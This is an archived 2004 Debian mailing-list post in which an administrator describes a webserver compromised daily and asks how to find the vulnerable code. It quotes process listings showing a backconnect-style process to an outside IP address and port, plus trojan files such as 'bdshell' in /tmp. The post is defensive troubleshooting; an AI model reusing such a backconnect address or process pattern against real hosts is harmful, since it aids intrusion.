advice on finding the vulnerable code on webserver

To: <debian-user@lists.debian.org>
Subject: advice on finding the vulnerable code on webserver
From: "Ross Tsolakidis" <Ross.Tsolakidis@day3.com.au>
Date: Tue, 1 Jun 2004 09:50:34 +1000
Message-id: <[🔎] D03D875AFA05D34C98F1B0DBB71C3DBA6E189F@hermes.powerserve.lan>

Hi all,

One of our webservers seems to get compromised on a daily basis.
When I do a ps ax I see these processes all the time.

18687 ?        S      0:00 shell
18701 ?        Z      0:00 [sh <defunct>]
18704 ?        T      0:00 ./3 200.177.162.185 1524
18705 ?        Z      0:00 [3 <defunct>]

And if I check the /tmp dir there are strange executable files in there
that are owned by www-data.
Such as ./3 and others like ./bdshell.
Definitely some sort of Trojan.

When I did a virus check first time it showed that it was infected with
the old Linux.RST virus, it basically stuffed the entire /bin directory.

I did a rebuild, virus checked all client files on a different server,
then copied them back.

After a week, same thing.
Infected.

/tmp/sl# ls -al
total 452
drwxr-xr-x    2 www-data www-data     4096 Jun  1 09:32 .
drwxrwxrwt    3 root     root         4096 Jun  1 09:37 ..
-rwsrwsrwt    1 www-data www-data   446714 May 29 05:12 ps.htm

I'm pretty sure it's one of our clients who has some dodgy php-nuke
sites or something like that.

All our other webservers are fine running the same build.
But this server is the major client one where we allow them to FTP and
make MYSQL changes.

I'd appreciate some help on how to stop this from happening.

Running Debian Stable with all the security updates.

P.S. Sorry for the Disclaimer, company policy, which I don't agree with,
yet they pay me so I must comply  :/

--
Ross.


DISCLAIMER: This e-mail and any files transmitted with it may 
be privileged and confidential, and are intended only for the use of the 
intended recipient. If you are not the intended recipient or responsible for 
delivering this e-mail to the intended recipient, any use, dissemination, 
forwarding, printing or copying of this e-mail and any attachments is strictly 
prohibited. If you have received this e-mail in error, please REPLY TO the 
SENDER to advise the error AND then DELETE the e-mail from your system.
Any views expressed in this e-mail and any files transmitted with 
it are those of the individual sender, except where the sender specifically 
states them to be the views of our organisation.
Our organisation does not represent or warrant that 
the attached files are free from computer viruses or other defects. The user 
assumes all responsibility for any loss or damage resulting directly or 
indirectly from the use of the attached files. In any event, the liability to 
our organisation is limited to either the resupply of the attached files or the 
cost of having the attached files resupplied.

Reply to:

Prev by Date: Re: Easy to use Mail Spam/ Content Filter?
Next by Date: Re: Best UPS for Linux?
Previous by thread: mozilla 1.6 offline/online?
Next by thread: problems with sound
Index(es):
- Date
- Thread